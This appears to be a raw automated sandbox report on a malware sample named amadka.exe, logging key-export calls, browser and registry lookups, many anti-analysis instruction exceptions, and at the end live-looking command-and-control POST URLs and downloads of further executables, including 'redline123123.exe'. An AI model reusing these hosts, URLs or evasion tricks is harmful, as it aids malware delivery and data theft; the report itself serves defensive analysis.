1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005170a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005170a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005170a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005168e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005168e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005168e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005164e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00517228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00517228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00517228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00517228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00517228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00517228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00517228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00517228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00517228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section \x00
section .idata
section
section gznyyhbr
section jufnpfbp
section .taggant
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc
exception.symbol: amadka+0x3120b9
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 3219641
exception.address: 0x11920b9
registers.esp: 2226260
registers.edi: 0
registers.eax: 1
registers.ebp: 2226276
registers.edx: 20119552
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 68 d3 15 e5 5f e9 22 03 00 00 ff 34 24 ff
exception.symbol: amadka+0x6b31d
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 439069
exception.address: 0xeeb31d
registers.esp: 2226228
registers.edi: 1968898280
registers.eax: 15644713
registers.ebp: 4005662740
registers.edx: 0
registers.ebx: 238825
registers.esi: 3
registers.ecx: 1969094656
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 51 e9 41 01 00 00 ff 34 24 58 53 89 14 24
exception.symbol: amadka+0x6c49d
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 443549
exception.address: 0xeec49d
registers.esp: 2226228
registers.edi: 1259
registers.eax: 32203
registers.ebp: 4005662740
registers.edx: 4294937496
registers.ebx: 238825
registers.esi: 15678280
registers.ecx: 349024689
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 7a 00 00 00 81 c7 7f 60 e9 66 e9 95 00 00
exception.symbol: amadka+0x1ea506
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2008326
exception.address: 0x106a506
registers.esp: 2226224
registers.edi: 15680323
registers.eax: 30815
registers.ebp: 4005662740
registers.edx: 17211979
registers.ebx: 417792
registers.esi: 17211421
registers.ecx: 2101608448
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 c7 04 24 d3 8e 9c 5e 89 04 24 68 e6 b0 d1
exception.symbol: amadka+0x1ea487
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2008199
exception.address: 0x106a487
registers.esp: 2226228
registers.edi: 4294939036
registers.eax: 30815
registers.ebp: 4005662740
registers.edx: 17242794
registers.ebx: 417792
registers.esi: 7596369
registers.ecx: 2101608448
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 13 9d 74 78 89 3c 24 89 0c 24 89 1c 24 e9
exception.symbol: amadka+0x1f09d7
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2034135
exception.address: 0x10709d7
registers.esp: 2226228
registers.edi: 96
registers.eax: 29475
registers.ebp: 4005662740
registers.edx: 96
registers.ebx: 17232994
registers.esi: 17266926
registers.ecx: 61024
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb ba d1 89 ef 57 57 bf 45 4d e2 6d 01 fa ff 34
exception.symbol: amadka+0x1f0689
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2033289
exception.address: 0x1070689
registers.esp: 2226228
registers.edi: 134889
registers.eax: 29475
registers.ebp: 4005662740
registers.edx: 4294941088
registers.ebx: 17232994
registers.esi: 17266926
registers.ecx: 61024
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 b8 a1 66 ab 3f 29
exception.symbol: amadka+0x1f5ab5
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2054837
exception.address: 0x1075ab5
registers.esp: 2226224
registers.edi: 4075032
registers.eax: 31660
registers.ebp: 4005662740
registers.edx: 1884690145
registers.ebx: 17232994
registers.esi: 17258399
registers.ecx: 1969148396
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 c7 04 24 c0 72 66 4d 81 34 24 a3 1d ef 7b
exception.symbol: amadka+0x1f5ee2
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2055906
exception.address: 0x1075ee2
registers.esp: 2226228
registers.edi: 4075032
registers.eax: 31660
registers.ebp: 4005662740
registers.edx: 1884690145
registers.ebx: 17232994
registers.esi: 17290059
registers.ecx: 1969148396
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 e9 07 fe ff ff bb db 81 95 05 e9 21 fd ff
exception.symbol: amadka+0x1f6291
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2056849
exception.address: 0x1076291
registers.esp: 2226228
registers.edi: 4075032
registers.eax: 1259
registers.ebp: 4005662740
registers.edx: 1884690145
registers.ebx: 17232994
registers.esi: 17261491
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 52 83 ec 04 89 24 24 81
exception.symbol: amadka+0x1fc852
exception.instruction: in eax, dx
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2082898
exception.address: 0x107c852
registers.esp: 2226220
registers.edi: 4075032
registers.eax: 1447909480
registers.ebp: 4005662740
registers.edx: 22104
registers.ebx: 1969033397
registers.esi: 17273430
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb
exception.symbol: amadka+0x1fdb74
exception.address: 0x107db74
exception.module: amadka.exe
exception.exception_code: 0xc000001d
exception.offset: 2087796
registers.esp: 2226220
registers.edi: 4075032
registers.eax: 1
registers.ebp: 4005662740
registers.edx: 22104
registers.ebx: 0
registers.esi: 17273430
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 0e 2a 2d 12 01
exception.symbol: amadka+0x1fb717
exception.instruction: in eax, dx
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2078487
exception.address: 0x107b717
registers.esp: 2226220
registers.edi: 4075032
registers.eax: 1447909480
registers.ebp: 4005662740
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 17273430
registers.ecx: 10
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 ca 03 00 00 35 5e 69 39 19 89 c7 58 56 be
exception.symbol: amadka+0x2024a6
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2106534
exception.address: 0x10824a6
registers.esp: 2226224
registers.edi: 4075032
registers.eax: 32169
registers.ebp: 4005662740
registers.edx: 2130566132
registers.ebx: 17309119
registers.esi: 10
registers.ecx: 2101608448
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 89 34 24 c7 04 24
exception.symbol: amadka+0x201fd8
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2105304
exception.address: 0x1081fd8
registers.esp: 2226228
registers.edi: 4075032
registers.eax: 32169
registers.ebp: 4005662740
registers.edx: 2130566132
registers.ebx: 17341288
registers.esi: 10
registers.ecx: 2101608448
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 1e fd ff ff be 06 eb 0f 32 e9 22 fd ff ff
exception.symbol: amadka+0x20273c
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2107196
exception.address: 0x108273c
registers.esp: 2226228
registers.edi: 4075032
registers.eax: 32169
registers.ebp: 4005662740
registers.edx: 4294938288
registers.ebx: 17341288
registers.esi: 10
registers.ecx: 584032
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: cd 01 eb 00 8b c8 6a 00 53 e8 03 00 00 00 20 5b
exception.symbol: amadka+0x202c0d
exception.instruction: int 1
exception.module: amadka.exe
exception.exception_code: 0xc0000005
exception.offset: 2108429
exception.address: 0x1082c0d
registers.esp: 2226188
registers.edi: 0
registers.eax: 2226188
registers.ebp: 4005662740
registers.edx: 13817
registers.ebx: 17313074
registers.esi: 17313074
registers.ecx: 3734886905
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 14 24 e9 22 00 00 00 31 fd 5f e9
exception.symbol: amadka+0x209ff7
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2138103
exception.address: 0x1089ff7
registers.esp: 2226228
registers.edi: 0
registers.eax: 28067
registers.ebp: 4005662740
registers.edx: 654654
registers.ebx: 530300672
registers.esi: 604292945
registers.ecx: 17343193
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 05 f2 62 7e 79 e9 f1 fc ff ff 81 c7 59 42 7e
exception.symbol: amadka+0x212193
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2171283
exception.address: 0x1092193
registers.esp: 2226224
registers.edi: 15638666
registers.eax: 17374095
registers.ebp: 4005662740
registers.edx: 6
registers.ebx: 38461049
registers.esi: 1968968720
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 bb 61 d4 e7 7f 81 c3 a7 30 42 5c 81 f3 b4
exception.symbol: amadka+0x211c48
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2169928
exception.address: 0x1091c48
registers.esp: 2226228
registers.edi: 4294938964
registers.eax: 17405078
registers.ebp: 4005662740
registers.edx: 6
registers.ebx: 38461049
registers.esi: 1968968720
registers.ecx: 262633
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 d2 ff 34 1a ff 34 24 5f 83 ec 04 89 04 24
exception.symbol: amadka+0x2185b6
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2196918
exception.address: 0x10985b6
registers.esp: 2226220
registers.edi: 4294938964
registers.eax: 32680
registers.ebp: 4005662740
registers.edx: 867346143
registers.ebx: 17431324
registers.esi: 1968968720
registers.ecx: 867346143
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 89 e5 e9 64 fc ff ff 5f 47 c1 e7 03 e9 15
exception.symbol: amadka+0x217ffb
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2195451
exception.address: 0x1097ffb
registers.esp: 2226220
registers.edi: 84201
registers.eax: 32680
registers.ebp: 4005662740
registers.edx: 4294937608
registers.ebx: 17431324
registers.esi: 1968968720
registers.ecx: 867346143
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 0c 24 e9 00 00 00 00 89
exception.symbol: amadka+0x219768
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2201448
exception.address: 0x1099768
registers.esp: 2226220
registers.edi: 84201
registers.eax: 30757
registers.ebp: 4005662740
registers.edx: 17434560
registers.ebx: 1373341519
registers.esi: 1968968720
registers.ecx: 1816543958
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 5e 0f 84 24 89 14 24 50 c7 04 24 50 2b fd
exception.symbol: amadka+0x21971e
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2201374
exception.address: 0x109971e
registers.esp: 2226220
registers.edi: 76109654
registers.eax: 30757
registers.ebp: 4005662740
registers.edx: 17406828
registers.ebx: 1373341519
registers.esi: 0
registers.ecx: 1816543958
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 e9 bd 01 00 00 81 ec 04 00 00 00 89 24 24
exception.symbol: amadka+0x2262de
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2253534
exception.address: 0x10a62de
registers.esp: 2226220
registers.edi: 116969
registers.eax: 17486278
registers.ebp: 4005662740
registers.edx: 2130566132
registers.ebx: 17453129
registers.esi: 4294940908
registers.ecx: 1788561223
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 db ff 34 13 ff 34 24 8b 34 24 81 c4 04 00
exception.symbol: amadka+0x239693
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2332307
exception.address: 0x10b9693
registers.esp: 2226188
registers.edi: 2104534378
registers.eax: 29592
registers.ebp: 4005662740
registers.edx: 17565800
registers.ebx: 2105257326
registers.esi: 2105972533
registers.ecx: 2148100416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 14 24 89 3c 24 51 e9 94 f7 ff ff
exception.symbol: amadka+0x239e32
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2334258
exception.address: 0x10b9e32
registers.esp: 2226188
registers.edi: 2104534378
registers.eax: 29592
registers.ebp: 4005662740
registers.edx: 17565800
registers.ebx: 4294940948
registers.esi: 10938704
registers.ecx: 2148100416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 3d a8 7d 16 89 14 24 55 e9 21 00 00 00 4a
exception.symbol: amadka+0x23a789
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2336649
exception.address: 0x10ba789
registers.esp: 2226184
registers.edi: 2104534378
registers.eax: 31121
registers.ebp: 4005662740
registers.edx: 640786447
registers.ebx: 17539870
registers.esi: 10938704
registers.ecx: 2148100416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 f6 ff 34 1e ff 34 24 e9 a9 00 00 00 83 e9
exception.symbol: amadka+0x23a896
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2336918
exception.address: 0x10ba896
registers.esp: 2226188
registers.edi: 2104534378
registers.eax: 31121
registers.ebp: 4005662740
registers.edx: 640786447
registers.ebx: 17570991
registers.esi: 10938704
registers.ecx: 2148100416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 89 e3 81 c3 04 00 00 00 83 eb 04 87 1c 24
exception.symbol: amadka+0x23a39e
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2335646
exception.address: 0x10ba39e
registers.esp: 2226188
registers.edi: 2104534378
registers.eax: 604292945
registers.ebp: 4005662740
registers.edx: 640786447
registers.ebx: 17570991
registers.esi: 4294938840
registers.ecx: 2148100416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 3c 24 56 89 2c 24 bd 38
exception.symbol: amadka+0x23b2e5
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2339557
exception.address: 0x10bb2e5
registers.esp: 2226184
registers.edi: 2104534378
registers.eax: 17542845
registers.ebp: 4005662740
registers.edx: 934770658
registers.ebx: 2141483766
registers.esi: 4294938840
registers.ecx: 707343411
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 55 53 bb 9a 92 dd
exception.symbol: amadka+0x23aede
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2338526
exception.address: 0x10baede
registers.esp: 2226188
registers.edi: 2104534378
registers.eax: 17568958
registers.ebp: 4005662740
registers.edx: 4294944152
registers.ebx: 432177504
registers.esi: 4294938840
registers.ecx: 707343411
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 81 ec 04 00 00 00 89 04 24 54 58 05 04 00
exception.symbol: amadka+0x2403e0
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2360288
exception.address: 0x10c03e0
registers.esp: 2226188
registers.edi: 17593416
registers.eax: 30594
registers.ebp: 4005662740
registers.edx: 0
registers.ebx: 65786
registers.esi: 17547597
registers.ecx: 1971716238
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 03 03 00 00 b8 da 0b 55 36 01 c7 58 68 38
exception.symbol: amadka+0x24027b
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2359931
exception.address: 0x10c027b
registers.esp: 2226188
registers.edi: 17566076
registers.eax: 30594
registers.ebp: 4005662740
registers.edx: 0
registers.ebx: 681745805
registers.esi: 17547597
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 0c 24 e9 5c 04 00 00 56 89 14 24
exception.symbol: amadka+0x24128a
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2364042
exception.address: 0x10c128a
registers.esp: 2226184
registers.edi: 17566076
registers.eax: 17566869
registers.ebp: 4005662740
registers.edx: 1489380215
registers.ebx: 15644854
registers.esi: 17547597
registers.ecx: 1849671248
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 e9 0e f9 ff ff 8b 0c 24 81 c4 04 00 00 00
exception.symbol: amadka+0x241448
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2364488
exception.address: 0x10c1448
registers.esp: 2226188
registers.edi: 17566076
registers.eax: 17598219
registers.ebp: 4005662740
registers.edx: 1489380215
registers.ebx: 15644854
registers.esi: 17547597
registers.ecx: 1849671248
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 89 04 24 e9 dc fe ff ff bb 7f 6c cf 3d 89
exception.symbol: amadka+0x240e33
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2362931
exception.address: 0x10c0e33
registers.esp: 2226188
registers.edi: 17566076
registers.eax: 17569655
registers.ebp: 4005662740
registers.edx: 0
registers.ebx: 15644854
registers.esi: 17547597
registers.ecx: 24811
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 01 ee f6 6f e9 8f 07 00 00 5a 81 ec 04 00
exception.symbol: amadka+0x2438f9
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2373881
exception.address: 0x10c38f9
registers.esp: 2226188
registers.edi: 17608049
registers.eax: 30329
registers.ebp: 4005662740
registers.edx: 5902
registers.ebx: 1374295822
registers.esi: 17576872
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb ba 00 8d 26 76 50 b8 b7 d7 df 7a 81 ea 21 5d
exception.symbol: amadka+0x243893
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2373779
exception.address: 0x10c3893
registers.esp: 2226188
registers.edi: 17580641
registers.eax: 30329
registers.ebp: 4005662740
registers.edx: 5902
registers.ebx: 0
registers.esi: 17576872
registers.ecx: 4076340584
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 51 89 04 24 56 e9 ee 02 00 00 81 e9 e7 f6
exception.symbol: amadka+0x244647
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2377287
exception.address: 0x10c4647
registers.esp: 2226188
registers.edi: 17580641
registers.eax: 26214
registers.ebp: 4005662740
registers.edx: 1295775248
registers.ebx: 747518614
registers.esi: 17607194
registers.ecx: 1630865404
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 e9 a0 01 00 00 55 57 52 c7 04 24 56 54 75
exception.symbol: amadka+0x244719
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2377497
exception.address: 0x10c4719
registers.esp: 2226188
registers.edi: 157417
registers.eax: 26214
registers.ebp: 4005662740
registers.edx: 0
registers.ebx: 747518614
registers.esi: 17584202
registers.ecx: 1630865404
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 9a f9 ff ff 81 ed 60 51 7f 1a 01 c5 81 c5
exception.symbol: amadka+0x259216
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2462230
exception.address: 0x10d9216
registers.esp: 2226184
registers.edi: 17664301
registers.eax: 31390
registers.ebp: 4005662740
registers.edx: 451312160
registers.ebx: 2611859893
registers.esi: 1979891976
registers.ecx: 468962245
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 23 99 6d 5d 89 3c 24 e9 aa 00 00 00 5b 57
exception.symbol: amadka+0x2589d9
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2460121
exception.address: 0x10d89d9
registers.esp: 2226188
registers.edi: 17695691
registers.eax: 31390
registers.ebp: 4005662740
registers.edx: 451312160
registers.ebx: 2611859893
registers.esi: 1979891976
registers.ecx: 468962245
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 81 ec 04 00 00 00 e9 c4 fe ff ff 35 25 5c
exception.symbol: amadka+0x258da7
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2461095
exception.address: 0x10d8da7
registers.esp: 2226188
registers.edi: 17667283
registers.eax: 31390
registers.ebp: 4005662740
registers.edx: 451312160
registers.ebx: 3909414019
registers.esi: 1979891976
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 60 00 00 00 bd e5 6f d1 2d 89 ee 5d c1 ee
exception.symbol: amadka+0x25c54d
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2475341
exception.address: 0x10dc54d
registers.esp: 2226188
registers.edi: 17667283
registers.eax: 28961
registers.ebp: 4005662740
registers.edx: 1495915926
registers.ebx: 2075863443
registers.esi: 17707428
registers.ecx: 1736172636
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 3c 24 55 c7 04 24 c5 f2 b5 75 ff
exception.symbol: amadka+0x25c66f
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2475631
exception.address: 0x10dc66f
registers.esp: 2226188
registers.edi: 17667283
registers.eax: 28961
registers.ebp: 4005662740
registers.edx: 607947091
registers.ebx: 0
registers.esi: 17681296
registers.ecx: 1736172636
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 c3 15 b4 ff 7f e9 98 fe ff ff 01 fb 5f e9
exception.symbol: amadka+0x26843a
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2524218
exception.address: 0x10e843a
registers.esp: 2226184
registers.edi: 17714727
registers.eax: 30430
registers.ebp: 4005662740
registers.edx: 2130566132
registers.ebx: 17725906
registers.esi: 17682680
registers.ecx: 2101608448
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 98 01 00 00 53 89 e3 e9 e4 f7 ff ff 89 14
exception.symbol: amadka+0x268301
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2523905
exception.address: 0x10e8301
registers.esp: 2226188
registers.edi: 17714727
registers.eax: 30430
registers.ebp: 4005662740
registers.edx: 2130566132
registers.ebx: 17756336
registers.esi: 17682680
registers.ecx: 2101608448
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 a6 07 00 00 ba 84 c8 fb 6b 81 c2 75 ac 37
exception.symbol: amadka+0x267b5b
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2521947
exception.address: 0x10e7b5b
registers.esp: 2226188
registers.edi: 0
registers.eax: 30430
registers.ebp: 4005662740
registers.edx: 2130566132
registers.ebx: 17728708
registers.esi: 607947091
registers.ecx: 2101608448
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 31 c0 ff 34 01 51 89 3c 24 81 ec 04 00 00 00
exception.symbol: amadka+0x2690dc
exception.instruction: sti
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2527452
exception.address: 0x10e90dc
registers.esp: 2226188
registers.edi: 0
registers.eax: 32060
registers.ebp: 4005662740
registers.edx: 2130566132
registers.ebx: 2071306241
registers.esi: 607947091
registers.ecx: 17761249
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://147.45.47.155/ku4Nor9/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/cost/sarra.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/soka/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/cost/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/well/random.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.91.77.81/Kiru9gu/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/lend/judit.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/lend/redline123123.exe
